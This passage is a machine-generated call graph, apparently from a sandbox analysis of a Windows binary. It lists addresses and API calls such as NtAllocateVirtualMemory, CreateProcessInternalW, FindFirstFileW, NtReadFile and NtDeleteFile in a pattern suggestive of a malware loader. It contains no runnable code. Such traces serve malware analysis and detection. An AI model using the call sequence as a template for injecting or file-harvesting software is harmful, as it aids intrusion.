96113->96114 96115 2a444a0 LdrLoadDll 96114->96115 96116 2a49d05 96115->96116 96117 2a444a0 LdrLoadDll 96116->96117 96118 2a49d64 96117->96118 96145 2a47670 96118->96145 96121 2a49db2 96121->96110 96123 2a49dc9 96123->96110 96124 2a49dc0 96124->96123 96125 2a444a0 LdrLoadDll 96124->96125 96126 2a49e29 96125->96126 96128 2a49eb1 96126->96128 96188 2a49350 96126->96188 96130 2a49f09 96128->96130 96197 2a496b0 96128->96197 96131 2a57050 2 API calls 96130->96131 96132 2a49f10 96131->96132 96132->96110 96134 2a49906 96133->96134 96142 2a49911 96133->96142 96135 2a57130 2 API calls 96134->96135 96135->96142 96136 2a49927 96136->96112 96137 2a47670 2 API calls 96137->96142 96138 2a49c1e 96139 2a49c37 96138->96139 96140 2a57050 2 API calls 96138->96140 96139->96112 96140->96139 96141 2a444a0 LdrLoadDll 96141->96142 96142->96136 96142->96137 96142->96138 96142->96141 96143 2a49350 3 API calls 96142->96143 96144 2a496b0 2 API calls 96142->96144 96143->96142 96144->96142 96146 2a50c00 LdrLoadDll 96145->96146 96147 2a47691 96146->96147 96148 2a47698 GetFileAttributesW 96147->96148 96149 2a476a3 96147->96149 96148->96149 96149->96121 96150 2a51db0 96149->96150 96151 2a51dbe 96150->96151 96152 2a51dc5 96150->96152 96151->96124 96201 2a441c0 96152->96201 96155 2a51e09 96157 2a57130 2 API calls 96155->96157 96159 2a51fff 96155->96159 96158 2a51e22 96157->96158 96158->96159 96160 2a51e37 96158->96160 96161 2a51faa 96158->96161 96159->96124 96206 2a4c9d0 LdrLoadDll 96160->96206 96163 2a51fb4 96161->96163 96164 2a51f3c 96161->96164 96207 2a4c9d0 LdrLoadDll 96163->96207 96167 2a57050 2 API calls 96164->96167 96187 2a51fa1 96164->96187 96165 2a51e4e 96170 2a50c00 LdrLoadDll 96165->96170 96167->96159 96168 2a51fcb 96208 2a51150 LdrLoadDll 96168->96208 96172 2a51e6a 96170->96172 96171 2a51fe1 96173 2a50c00 LdrLoadDll 96171->96173 96174 2a50c00 LdrLoadDll 96172->96174 96173->96159 96175 2a51e86 96174->96175 96176 2a50c00 LdrLoadDll 96175->96176 96177 2a51ea5 96176->96177 96178 2a50c00 LdrLoadDll 96177->96178 96179 2a51ec1 96178->96179 96180 2a50c00 LdrLoadDll 96179->96180 96181 2a51edd 96180->96181 96182 2a50c00 LdrLoadDll 96181->96182 96183 2a51efc 96182->96183 96184 2a50c00 LdrLoadDll 96183->96184 96185 2a51f18 96184->96185 96186 2a50c00 LdrLoadDll 96185->96186 96186->96164 96187->96124 96189 2a49376 96188->96189 96209 2a4c8c0 96189->96209 96191 2a493dd 96193 2a49560 96191->96193 96195 2a493fb 96191->96195 96192 2a49545 96192->96126 96193->96192 96194 2a49220 3 API calls 96193->96194 96194->96193 96195->96192 96214 2a49220 96195->96214 96198 2a496d6 96197->96198 96199 2a4c8c0 2 API calls 96198->96199 96200 2a49752 96199->96200 96200->96128 96202 2a441e4 96201->96202 96203 2a441eb 96202->96203 96204 2a44220 LdrLoadDll 96202->96204 96203->96155 96205 2a51880 LdrLoadDll 96203->96205 96204->96203 96205->96155 96206->96165 96207->96168 96208->96171 96211 2a4c8d6 96209->96211 96210 2a4c8e3 96210->96191 96211->96210 96212 2a57050 2 API calls 96211->96212 96213 2a4c914 96212->96213 96213->96191 96215 2a49236 96214->96215 96218 2a4cdb0 96215->96218 96217 2a4933e 96217->96195 96219 2a4cded 96218->96219 96220 2a4ce9d 96219->96220 96222 2a4ce40 96219->96222 96225 2a4deb0 96219->96225 96220->96217 96223 2a4ce79 96222->96223 96224 2a57050 2 API calls 96222->96224 96223->96217 96224->96223 96227 2a4dec4 96225->96227 96228 2a4dbb0 96225->96228 96227->96222 96229 2a4dbd6 96228->96229 96232 2a4dbf9 96229->96232 96241 2a56fc0 96229->96241 96231 2a4dea1 96231->96227 96232->96231 96233 2a444a0 LdrLoadDll 96232->96233 96240 2a4dcea 96232->96240 96234 2a4dd66 96233->96234 96235 2a444a0 LdrLoadDll 96234->96235 96235->96240 96236 2a4de83 96238 2a57050 2 API calls 96236->96238 96239 2a4de93 96238->96239 96239->96227 96240->96231 96240->96236 96244 2a3b610 96240->96244 96247 2a55370 96241->96247 96243 2a56ff1 96243->96232 96245 2a56fc0 2 API calls 96244->96245 96246 2a3cc81 96244->96246 96245->96246 96246->96236 96248 2a55391 96247->96248 96249 2a553d3 96247->96249 96250 2a56230 LdrLoadDll 96248->96250 96251 2a56230 LdrLoadDll 96249->96251 96252 2a553ab 96250->96252 96253 2a553e9 NtAllocateVirtualMemory 96251->96253 96252->96243 96253->96243 96254 2a550a0 96255 2a550bd 96254->96255 96256 2a56230 LdrLoadDll 96255->96256 96257 2a550ce 96256->96257 96260 4ab2af0 LdrInitializeThunk 96257->96260 96258 2a550f9 96260->96258 96261 2a4256c 96262 2a425ab 96261->96262 96264 2a42573 96261->96264 96266 2a425d3 96262->96266 96267 2a45cc0 96262->96267 96265 2a441c0 LdrLoadDll 96264->96265 96265->96262 96268 2a45cf3 96267->96268 96278 2a54de0 96268->96278 96270 2a45d17 96270->96266 96275 2a55240 2 API calls 96277 2a45dbc 96275->96277 96276 2a45d52 96276->96275 96277->96266 96279 2a54dfd 96278->96279 96280 2a56230 LdrLoadDll 96279->96280 96281 2a45d10 96280->96281 96281->96270 96282 2a54e30 96281->96282 96283 2a54e4d 96282->96283 96284 2a56230 LdrLoadDll 96283->96284 96285 2a54e5e 96284->96285 96292 4ab2ca0 LdrInitializeThunk 96285->96292 96286 2a45d3a 96286->96270 96288 2a55740 96286->96288 96289 2a5575a 96288->96289 96290 2a56230 LdrLoadDll 96289->96290 96291 2a5576b 96290->96291 96291->96276 96292->96286 96295 2a507f5 96296 2a507ba 96295->96296 96297 2a55240 2 API calls 96296->96297 96298 2a507c1 96297->96298 96301 2a57170 96298->96301 96300 2a507cc 96302 2a55500 2 API calls 96301->96302 96303 2a5718d 96302->96303 96303->96300 96304 2a399b0 96306 2a39df8 96304->96306 96307 2a3a242 96306->96307 96308 2a56ce0 96306->96308 96309 2a56d06 96308->96309 96316 2a430f0 96309->96316 96311 2a56d12 96312 2a56d40 96311->96312 96319 2a53570 96311->96319 96323 2a555a0 LdrLoadDll 96312->96323 96315 2a56d51 96315->96307 96318 2a430fd 96316->96318 96324 2a43040 96316->96324 96318->96311 96320 2a535ca 96319->96320 96322 2a535d7 96320->96322 96358 2a41fb0 96320->96358 96322->96312 96323->96315 96331 2a520c0 96324->96331 96328 2a43063 96330 2a43070 96328->96330 96338 2a55bc0 96328->96338 96330->96318 96332 2a520cf 96331->96332 96333 2a50c00 LdrLoadDll 96332->96333 96334 2a43057 96333->96334 96335 2a52110 96334->96335 96345 2a554b0 96335->96345 96340 2a55bd8 96338->96340 96339 2a55bfc 96339->96330 96340->96339 96349 2a54960 96340->96349 96343 2a57050 2 API calls 96344 2a55c6a 96343->96344 96344->96330 96346 2a554cd 96345->96346 96347 2a56230 LdrLoadDll 96346->96347 96348 2a5212d 96347->96348 96348->96328 96350 2a5497a 96349->96350 96351 2a56230 LdrLoadDll 96350->96351 96352 2a5498b 96351->96352 96355 4ab2c0a 96352->96355 96353 2a549a6 96353->96343 96356 4ab2c1f LdrInitializeThunk 96355->96356 96357 4ab2c11 96355->96357 96356->96353 96357->96353 96359 2a41fe5 96358->96359 96376 2a471c0 96359->96376 96361 2a41fed 96362 2a42249 96361->96362 96363 2a57130 2 API calls 96361->96363 96362->96322 96364 2a42003 96363->96364 96365 2a57130 2 API calls 96364->96365 96366 2a42014 96365->96366 96367 2a57130 2 API calls 96366->96367 96368 2a42025 96367->96368 96388 2a45810 96368->96388 96370 2a4208d 96375 2a420b8 96370->96375 96418 2a46420 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96370->96418 96372 2a42032 96372->96370 96417 2a45990 LdrLoadDll 96372->96417 96398 2a41ac0 96375->96398 96377 2a471ec 96376->96377 96419 2a44550 96377->96419 96379 2a471fe 96423 2a470b0 96379->96423 96382 2a47231 96385 2a47242 96382->96385 96387 2a55240 2 API calls 96382->96387 96383 2a47219 96384 2a47224 96383->96384 96386 2a55240 2 API calls 96383->96386 96384->96361 96385->96361 96386->96384 96387->96385 96389 2a45826 96388->96389 96390 2a45830 96388->96390 96389->96372 96391 2a444a0 LdrLoadDll 96390->96391 96392 2a458c9 96391->96392 96393 2a443e0 LdrLoadDll 96392->96393 96395 2a458dd 96393->96395 96394 2a45903 96394->96372 96395->96394 96396 2a444a0 LdrLoadDll 96395->96396 96397 2a4592a 96396->96397 96397->96372 96400 2a41ada 96398->96400 96444 2a47480 96398->96444 96401 2a41fa5 96400->96401 96450 2a50100 96400->96450 96401->96362 96404 2a41ce1 96458 2a58260 96404->96458 96406 2a41b38 96406->96401 96453 2a58130 96406->96453 96407 2a41cf6 96413 2a41d0c 96407->96413 96464 2a402a0 96407->96464 96408 2a402a0 4 API calls 96408->96413 96411 2a41dc3 96411->96413 96477 2a40560 96411->96477 96413->96401 96413->96408 96414 2a40560 2 API calls 96413->96414 96481 2a47420 96413->96481 96414->96413 96415 2a47420 LdrLoadDll LdrInitializeThunk 96416 2a41e3a 96415->96416 96416->96413 96416->96415 96417->96370 96418->96375 96420 2a44596 96419->96420 96421 2a443e0 LdrLoadDll 96420->96421 96422 2a44629 96421->96422 96422->96379 96424 2a470ca 96423->96424 96432 2a471a6 96423->96432 96425 2a444a0 LdrLoadDll 96424->96425 96426 2a4710f 96425->96426 96433 2a549b0 96426->96433 96428 2a47154 96437 2a54a00 96428->96437 96431 2a55240 2 API calls 96431->96432 96432->96382 96432->96383 96434 2a549ca 96433->96434 96435 2a56230 LdrLoadDll 96434->96435 96436 2a549db 96435->96436 96436->96428 96438 2a54a1d 96437->96438 96439 2a56230 LdrLoadDll 96438->96439 96440 2a54a2e 96439->96440 96443 4ab35c0 LdrInitializeThunk 96440->96443 96441 2a4719a 96441->96431 96443->96441 96445 2a4748d 96444->96445 96446 2a50c00 LdrLoadDll 96445->96446 96447 2a474a7 96446->96447 96448 2a474b5 96447->96448 96449 2a474ae SetErrorMode 96447->96449 96448->96400 96449->96448 96451 2a50121 96450->96451 96452 2a56fc0 2 API calls 96450->96452 96451->96406 96452->96451 96454 2a58146 96453->96454 96455 2a58140 96453->96455 96456 2a57130 2 API calls 96454->96456 96455->96404 96457 2a5816c 96456->96457 96457->96404 96459 2a581d0 96458->96459 96460 2a57130 2 API calls 96459->96460 96461 2a5822d 96459->96461 96462 2a5820a 96460->96462 96461->96407 96463 2a57050 2 API calls 96462->96463 96463->96461 96465 2a402b0 96464->96465 96466 2a402ab 96464->96466 96467 2a56fc0 2 API calls 96465->96467 96466->96411 96470 2a402d5 96467->96470 96468 2a4033c 96468->96411 96470->96468 96471 2a40342 96470->96471 96476 2a56fc0 2 API calls 96470->96476 96485 2a54910 96470->96485 96491 2a55460 96470->96491 96473 2a4036c 96471->96473 96474 2a55460 2 API calls 96471->96474 96473->96411 96475 2a4035d 96474->96475 96475->96411 96476->96470 96478 2a4057c 96477->96478 96479 2a55460 2 API calls 96478->96479 96480 2a40582 96479->96480 96480->96416 96482 2a47433 96481->96482 96499 2a54890 96482->96499 96484 2a4745e 96484->96413 96486 2a5492a 96485->96486 96487 2a56230 LdrLoadDll 96486->96487 96488 2a5493b 96487->96488 96497 4ab2df0 LdrInitializeThunk 96488->96497 96489 2a54952 96489->96470 96492 2a5547a 96491->96492 96493 2a56230 LdrLoadDll 96492->96493 96494 2a5548b 96493->96494 96498 4ab2c70 LdrInitializeThunk 96494->96498 96495 2a554a2 96495->96470 96497->96489 96498->96495 96500 2a548b1 96499->96500 96501 2a548e3 96499->96501 96502 2a56230 LdrLoadDll 96500->96502 96503 2a56230 LdrLoadDll 96501->96503 96504 2a548cb 96502->96504 96505 2a548f9 96503->96505 96504->96484 96508 4ab2dd0 LdrInitializeThunk 96505->96508 96506 2a54908 96506->96484 96508->96506 96509 2a4e8b0 96510 2a4e8fc 96509->96510 96511 2a444a0 LdrLoadDll 96510->96511 96512 2a4ea07 96511->96512 96513 2a45cc0 3 API calls 96512->96513 96515 2a4ea3d 96513->96515 96514 2a4ea44 96515->96514 96516 2a444a0 LdrLoadDll 96515->96516 96517 2a4ea80 96516->96517 96518 2a45dd0 2 API calls 96517->96518 96520 2a4eac0 96518->96520 96519 2a4ebe3 96520->96519 96521 2a4ebf2 96520->96521 96543 2a4e690 96520->96543 96522 2a55240 2 API calls 96521->96522 96524 2a4ebfc 96522->96524 96525 2a4eaf5 96525->96521 96526 2a4eb00 96525->96526 96527 2a57130 2 API calls 96526->96527 96528 2a4eb29 96527->96528 96529 2a4eb32 96528->96529 96530 2a4eb48 96528->96530 96531 2a55240 2 API calls 96529->96531 96572 2a4e580 CoInitialize 96530->96572 96534 2a4eb3c 96531->96534 96533 2a4eb56 96574 2a54d80 96533->96574 96536 2a4ebd2 96537 2a55240 2 API calls 96536->96537 96539 2a4ebdc 96537->96539 96540 2a57050 2 API calls 96539->96540 96540->96519 96541 2a4eb74 96541->96536 96542 2a54d80 2 API calls 96541->96542 96580 2a4e4b0 LdrLoadDll RtlFreeHeap 96541->96580 96542->96541 96544 2a4e6ac 96543->96544 96545 2a441c0 LdrLoadDll 96544->96545 96547 2a4e6ca 96545->96547 96546 2a4e6d3 96546->96525 96547->96546 96548 2a50c00 LdrLoadDll 96547->96548 96549 2a4e6f0 96548->96549 96550 2a50c00 LdrLoadDll 96549->96550 96551 2a4e70b 96550->96551 96552 2a50c00 LdrLoadDll 96551->96552 96553 2a4e724 96552->96553 96554 2a50c00 LdrLoadDll 96553->96554 96555 2a4e740 96554->96555 96556 2a50c00 LdrLoadDll 96555->96556 96557 2a4e759 96556->96557 96558 2a50c00 LdrLoadDll 96557->96558 96559 2a4e772 96558->96559 96560 2a441c0 LdrLoadDll 96559->96560 96562 2a4e79e 96560->96562 96561 2a4e84d 96561->96525 96562->96561 96563 2a50c00 LdrLoadDll 96562->96563 96564 2a4e7c3 96563->96564 96565 2a441c0 LdrLoadDll 96564->96565 96566 2a4e7f8 96565->96566 96566->96561 96567 2a50c00 LdrLoadDll 96566->96567 96568 2a4e81b 96567->96568 96569 2a50c00 LdrLoadDll 96568->96569 96570 2a4e834 96569->96570 96571 2a50c00 LdrLoadDll 96570->96571 96571->96561 96573 2a4e5e5 96572->96573 96573->96533 96575 2a54d9d 96574->96575 96576 2a56230 LdrLoadDll 96575->96576 96577 2a54dae 96576->96577 96581 4ab2ba0 LdrInitializeThunk 96577->96581 96578 2a54dcd 96578->96541 96580->96541 96581->96578 96582 2a44cf0 96584 2a44d1a 96582->96584 96583 2a50100 2 API calls 96585 2a44db9 96583->96585 96584->96583 96607 2a45188 96584->96607 96585->96607 96608 2a40b00 9 API calls 96585->96608 96587 2a44e27 96588 2a57050 2 API calls 96587->96588 96587->96607 96590 2a44e3f 96588->96590 96589 2a44e71 96595 2a44e78 96589->96595 96628 2a47250 96589->96628 96590->96589 96627 2a33910 LdrLoadDll LdrInitializeThunk 96590->96627 96592 2a44eb1 96592->96607 96635 2a54b00 96592->96635 96595->96607 96609 2a545f0 96595->96609 96597 2a44f0e 96618 2a54670 96597->96618 96599 2a45117 96603 2a4513a 96599->96603 96645 2a54770 96599->96645 96600 2a44f2e 96600->96599 96644 2a33980 LdrLoadDll LdrInitializeThunk 96600->96644 96604 2a47420 2 API calls 96603->96604 96605 2a45157 96603->96605 96604->96603 96654 2a555a0 LdrLoadDll 96605->96654 96608->96587 96610 2a54640 96609->96610 96611 2a5460e 96609->96611 96612 2a56230 LdrLoadDll 96610->96612 96613 2a56230 LdrLoadDll 96611->96613 96614 2a54656 96612->96614 96615 2a54628 96613->96615 96655 4ab39b0 LdrInitializeThunk 96614->96655 96615->96597 96616 2a54665 96616->96597 96619 2a5468e 96618->96619 96620 2a546c0 96618->96620 96621 2a56230 LdrLoadDll 96619->96621 96622 2a56230 LdrLoadDll 96620->96622 96623 2a546a8 96621->96623 96624 2a546d6 96622->96624 96623->96600 96656 4ab4340 LdrInitializeThunk 96624->96656 96625 2a546e5 96625->96600 96627->96589 96629 2a4726d 96628->96629 96657 2a54a50 96629->96657 96631 2a472bd 96632 2a472c4 96631->96632 96633 2a54b00 2 API calls 96631->96633 96632->96592 96634 2a472ed 96633->96634 96634->96592 96636 2a54b70 96635->96636 96637 2a54b1e 96635->96637 96639 2a56230 LdrLoadDll 96636->96639 96638 2a56230 LdrLoadDll 96637->96638 96641 2a54b38 96638->96641 96640 2a54b86 96639->96640 96667 4ab2d10 LdrInitializeThunk 96640->96667 96641->96595 96642 2a54bb5 96642->96595 96644->96599 96646 2a547c3 96645->96646 96647 2a54791 96645->96647 96648 2a56230 LdrLoadDll 96646->96648 96649 2a56230 LdrLoadDll 96647->96649 96650 2a547d9 96648->96650 96651 2a547ab 96649->96651 96668 4ab2fb0 LdrInitializeThunk 96650->96668 96651->96603 96652 2a547e8 96652->96603 96654->96607 96655->96616 96656->96625 96658 2a54ab4 96657->96658 96659 2a54a6e 96657->96659 96660 2a56230 LdrLoadDll 96658->96660 96661 2a56230 LdrLoadDll 96659->96661 96662 2a54aca 96660->96662 96663 2a54a88 96661->96663 96666 4ab2f30 LdrInitializeThunk 96662->96666 96663->96631 96664 2a54aed 96664->96631 96666->96664 96667->96642 96668->96652 96669 2a46770 96670 2a4679e 96669->96670 96671 2a47250 3 API calls 96670->96671 96672 2a467c6 96671->96672 96673 2a467cd 96672->96673 96674 2a57170 2 API calls 96672->96674 96675 2a467dd 96674->96675 96676 2a50af0 96677 2a50aff 96676->96677 96678 2a50b43 96677->96678 96681 2a50b84 96677->96681 96683 2a50b89 96677->96683 96679 2a57050 2 API calls 96678->96679 96680 2a50b53 96679->96680 96682 2a57050 2 API calls 96681->96682 96682->96683 96684 2a48bf1 96692 2a48c00 96684->96692 96685 2a48c07 96686 2a50c00 LdrLoadDll 96686->96692 96687 2a48cef GetFileAttributesW 96687->96692 96688 2a48e9a 96689 2a48eb3 96688->96689 96690 2a57050 2 API calls 96688->96690 96690->96689 96691 2a444a0 LdrLoadDll 96691->96692 96692->96685 96692->96686 96692->96687 96692->96688 96692->96691 96693 2a4c8c0 2 API calls 96692->96693 96696 2a51ae0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96692->96696 96697 2a51980 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96692->96697 96693->96692 96696->96692 96697->96692 96698 2a547f0 96699 2a54811 96698->96699 96700 2a5484f 96698->96700 96701 2a56230 LdrLoadDll 96699->96701 96702 2a56230 LdrLoadDll 96700->96702 96703 2a5482b 96701->96703 96704 2a54865 96702->96704 96707 4ab2ee0 LdrInitializeThunk 96704->96707 96705 2a54880 96707->96705 96708 2a53f30 96709 2a53f8a 96708->96709 96711 2a53f97 96709->96711 96712 2a524d0 96709->96712 96713 2a56fc0 2 API calls 96712->96713 96715 2a52511 96713->96715 96714 2a52616 96714->96711 96715->96714 96716 2a441c0 LdrLoadDll 96715->96716 96717 2a52557 96716->96717 96718 2a50c00 LdrLoadDll 96717->96718 96719 2a5257c 96718->96719 96719->96714 96720 2a52590 Sleep 96719->96720 96720->96719 96721 2a54472 96722 2a5447a 96721->96722 96723 2a5447d 96722->96723 96724 2a5440c RtlDosPathNameToNtPathName_U 96722->96724 96725 2a42f3c 96726 2a470b0 3 API calls 96725->96726 96727 2a42f4c 96726->96727 96728 2a42f7a 96727->96728 96729 2a42f61 96727->96729 96731 2a55240 2 API calls 96727->96731 96733 2a3f9c0 LdrLoadDll 96729->96733 96731->96729 96732 2a42f6b 96733->96732 96735 2a502c1 96749 2a55100 96735->96749 96737 2a502e2 96738 2a502f9 96737->96738 96756 2a54ee0 LdrLoadDll 96737->96756 96740 2a50315 96738->96740 96741 2a50300 96738->96741 96743 2a55240 2 API calls 96740->96743 96742 2a55240 2 API calls 96741->96742 96744 2a50309 96742->96744 96746 2a5031e 96743->96746 96745 2a5034a 96746->96745 96747 2a57050 2 API calls 96746->96747 96748 2a5033e 96747->96748 96750 2a5511e 96749->96750 96751 2a5516c 96749->96751 96752 2a56230 LdrLoadDll 96750->96752 96753 2a56230 LdrLoadDll 96751->96753 96754 2a55138 96752->96754 96755 2a55182 NtReadFile 96753->96755 96754->96737 96755->96737 96756->96738 96757 2a4c440 96758 2a4c462 96757->96758 96759 2a444a0 LdrLoadDll 96758->96759 96760 2a4c653 96759->96760 96761 2a444a0 LdrLoadDll 96760->96761 96762 2a4c678 96761->96762 96763 2a443e0 LdrLoadDll 96762->96763 96764 2a4c68c 96763->96764 96788 2a4c300 96764->96788 96767 2a4c300 6 API calls 96768 2a4c702 96767->96768 96769 2a4c300 6 API calls 96768->96769 96770 2a4c71a 96769->96770 96771 2a4c300 6 API calls 96770->96771 96772 2a4c732 96771->96772 96773 2a4c300 6 API calls 96772->96773 96774 2a4c74d 96773->96774 96775 2a4c300 6 API calls 96774->96775 96776 2a4c765 96775->96776 96777 2a4c77f 96776->96777 96778 2a4c300 6 API calls 96776->96778 96779 2a4c7b3 96778->96779 96780 2a4c300 6 API calls 96779->96780 96781 2a4c7f0 96780->96781 96782 2a4c300 6 API calls 96781->96782 96783 2a4c82d 96782->96783 96784 2a4c300 6 API calls 96783->96784 96785 2a4c86a 96784->96785 96786 2a4c300 6 API calls 96785->96786 96787 2a4c8a7 96786->96787 96789 2a4c329 96788->96789 96790 2a50c00 LdrLoadDll 96789->96790 96791 2a4c369 96790->96791 96792 2a50c00 LdrLoadDll 96791->96792 96793 2a4c387 96792->96793 96794 2a50c00 LdrLoadDll 96793->96794 96796 2a4c3a9 96794->96796 96795 2a4c42d 96795->96767 96796->96795 96797 2a4c3d3 FindFirstFileW 96796->96797 96797->96795 96801 2a4c3ee 96797->96801 96798 2a4c414 FindNextFileW 96799 2a4c426 FindClose 96798->96799 96798->96801 96799->96795 96801->96798 96802 2a4c210 6 API calls 96801->96802 96802->96801 96803 2a551c0 96804 2a551e1 96803->96804 96805 2a5520f 96803->96805 96807 2a56230 LdrLoadDll 96804->96807 96806 2a56230 LdrLoadDll 96805->96806 96808 2a55225 NtDeleteFile 96806->96808 96809 2a551fb 96807->96809 96810 2a39950 96811 2a3995f 96810->96811 96812 2a50c00 LdrLoadDll 96811->96812 96813 2a3997a 96812->96813 96814 2a399a0 96813->96814 96815 2a3998d CreateThread 96813->96815 96816 2a4fa90 96817 2a4fab8 96816->96817 96818 2a444a0 LdrLoadDll 96817->96818 96819 2a4faf2 96818->96819 96820 2a45cc0 3 API calls 96819->96820 96822 2a4fb18 96820->96822 96821 2a4fb1f 96822->96821 96823 2a444a0 LdrLoadDll 96822->96823 96824 2a4fb5b 96823->96824 96825 2a444a0 LdrLoadDll 96824->96825 96826 2a4fb90 96825->96826 96827 2a45dd0 2 API calls 96826->96827 96828 2a4fbb4 96827->96828 96829 2a4fbf6 96828->96829 96842 2a4fd8a 96828->96842 96845 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96828->96845 96831 2a444a0 LdrLoadDll 96829->96831 96832 2a4fc27 96831->96832 96833 2a45dd0 2 API calls 96832->96833 96836 2a4fc4b 96833->96836 96834 2a4fc91 96835 2a45dd0 2 API calls 96834->96835 96840 2a4fcc1 96835->96840 96836->96834 96836->96842 96846 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96836->96846 96838 2a4fd07 96841 2a45dd0 2 API calls 96838->96841 96840->96838 96840->96842 96847 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96840->96847 96843 2a4fd66 96841->96843 96843->96842 96848 2a4f7e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 96843->96848 96845->96829 96846->96834 96847->96838 96848->96842 96849 2a46ad0 96850 2a46b42 96849->96850 96851 2a46ae8 96849->96851 96851->96850 96852 2a4a170 LdrLoadDll 96851->96852 96853 2a46b2c 96852->96853 96853->96850 96855 2a4a400 96853->96855 96856 2a4a426 96855->96856 96857 2a50c00 LdrLoadDll 96856->96857 96859 2a4a47a 96857->96859 96858 2a4a7f3 96858->96850 96859->96858 96902 2a555e0 96859->96902 96861 2a4a4cb 96862 2a4a7db 96861->96862 96864 2a58260 3 API calls 96861->96864 96863 2a57050 2 API calls 96862->96863 96863->96858 96865 2a4a4ea 96864->96865 96865->96862 96866 2a4a5f3 96865->96866 96867 2a54960 2 API calls 96865->96867 96909 2a454e0 LdrLoadDll LdrInitializeThunk LdrInitializeThunk 96866->96909 96868 2a4a571 96867->96868 96868->96866 96872 2a4a579 96868->96872 96870 2a4a61e 96870->96862 96874 2a4a653 96870->96874 96877 2a453d0 2 API calls 96870->96877 96871 2a4a5d9 96875 2a57050 2 API calls 96871->96875 96872->96858 96872->96871 96873 2a4a5a8 96872->96873 96906 2a453d0 96872->96906 96878 2a55240 2 API calls 96873->96878 96882 2a4a683 96874->96882 96883 2a4a7ba 96874->96883 96879 2a4a5e9 96875->96879 96877->96874 96880 2a4a5b8 96878->96880 96879->96850 96910 2a52750 LdrLoadDll LdrInitializeThunk 96880->96910 96911 2a552d0 96882->96911 96885 2a57050 2 API calls 96883->96885 96886 2a4a7d1 96885->96886 96886->96850 96887 2a4a6a2 96888 2a47250 3 API calls 96887->96888 96889 2a4a70b 96888->96889 96889->96862 96890 2a4a716 96889->96890 96891 2a57050 2 API calls 96890->96891 96892 2a4a73a 96891->96892 96920 2a54bc0 96892->96920 96895 2a54b00 2 API calls 96896 2a4a775 96895->96896 96897 2a4a77c 96896->96897 96898 2a54bc0 2 API calls 96896->96898 96897->96850 96899 2a4a7a2 96898->96899 96900 2a54770 2 API calls 96899->96900 96901 2a4a7b0 96900->96901 96901->96850 96903 2a555fa 96902->96903 96904 2a56230 LdrLoadDll 96903->96904 96905 2a5560b CreateProcessInternalW 96904->96905 96905->96861 96907 2a54b00 2 API calls 96906->96907 96908 2a4540e 96907->96908 96908->96873 96909->96870 96910->96871 96912 2a5532c 96911->96912 96913 2a552ee 96911->96913 96915 2a56230 LdrLoadDll 96912->96915 96914 2a56230 LdrLoadDll 96913->96914 96916 2a55308 96914->96916 96917 2a55342 96915->96917 96916->96887 96926 4ab2e80 LdrInitializeThunk 96917->96926 96918 2a5535d 96918->96887 96921 2a54bdd 96920->96921 96922 2a56230 LdrLoadDll 96921->96922 96923 2a54bee 96922->96923 96927 4ab2d30 LdrInitializeThunk 96923->96927 96924 2a4a74e 96924->96895 96926->96918 96927->96924 96928 2a4ec10 96929 2a4ec21 96928->96929 96931 2a4d890 96928->96931 96932 2a4d8b6 96931->96932 96933 2a444a0 LdrLoadDll 96932->96933 96934 2a4d90d 96933->96934 96935 2a444a0 LdrLoadDll 96934->96935 96937 2a4d94d 96934->96937 96935->96937 96936 2a47670 2 API calls 96939 2a4da31 96936->96939 96937->96936 96938 2a4da38 96938->96929 96939->96938 96941 2a4d570 96939->96941 96942 2a4d593 96941->96942 96943 2a51db0 3 API calls 96942->96943 96945 2a4d5a0 96943->96945 96944 2a4d5f5 96944->96939 96945->96944 96946 2a4d601 96945->96946 96947 2a4d5bf 96945->96947 96952 2a444a0 LdrLoadDll 96946->96952 96948 2a4d5e4 96947->96948 96949 2a4d5c7 96947->96949 96951 2a57050 2 API calls 96948->96951 96950 2a57050 2 API calls 96949->96950 96953 2a4d5d8 96950->96953 96951->96944 96954 2a4d623 96952->96954 96953->96939 96955 2a4c8c0 2 API calls 96954->96955 96956 2a4d645 96955->96956 96960 2a4d65d 96956->96960 96961 2a4d748 96956->96961 96957 2a4d72f 96958 2a57050 2 API calls 96957->96958 96959 2a4d853 96958->96959 96959->96939 96960->96957 96964 2a4ced0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96960->96964 96961->96957 96965 2a4ced0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 96961->96965 96964->96960 96965->96961 96966 2a45450 96967 2a47420 2 API calls 96966->96967 96968 2a45480 96967->96968 96970 2a454ac 96968->96970 96971 2a473a0 96968->96971 96979 2a54560 96971->96979 96973 2a473e4 96974 2a47405 96973->96974 96986 2a546f0 96973->96986 96974->96968 96976 2a473f5 96977 2a47411 96976->96977 96978 2a55240 2 API calls 96976->96978 96977->96968 96978->96974 96980 2a5457e 96979->96980 96981 2a545b8 96979->96981 96982 2a56230 LdrLoadDll 96980->96982 96983 2a56230 LdrLoadDll 96981->96983 96984 2a54598 96982->96984 96985 2a545ce 96983->96985 96984->96973 96985->96973 96987 2a54711 96986->96987 96988 2a54743 96986->96988 96989 2a56230 LdrLoadDll 96987->96989 96990 2a56230 LdrLoadDll 96988->96990 96993 2a5472b 96989->96993 96991 2a54759 96990->96991 96995 4ab4650 LdrInitializeThunk 96991->96995 96992 2a54768 96992->96976 96993->96976 96995->96992 96996 2a4f190 96997 2a4f1ad 96996->96997 96998 2a441c0 LdrLoadDll 96997->96998 96999 2a4f1cb 96998->96999 97000 2a50c00 LdrLoadDll 96999->97000 97017 2a4f3d4 96999->97017 97001 2a4f1fb 97000->97001 97002 2a50c00 LdrLoadDll 97001->97002 97003 2a4f214 97002->97003 97004 2a50c00 LdrLoadDll 97003->97004 97005 2a4f22d 97004->97005 97006 2a50c00 LdrLoadDll 97005->97006 97007 2a4f249 97006->97007 97008 2a50c00 LdrLoadDll 97007->97008 97009 2a4f262 97008->97009 97010 2a50c00 LdrLoadDll 97009->97010 97011 2a4f27b 97010->97011 97012 2a50c00 LdrLoadDll 97011->97012 97013 2a4f297 97012->97013 97014 2a50c00 LdrLoadDll 97013->97014 97015 2a4f2b0 97014->97015 97016 2a50c00 LdrLoadDll 97015->97016 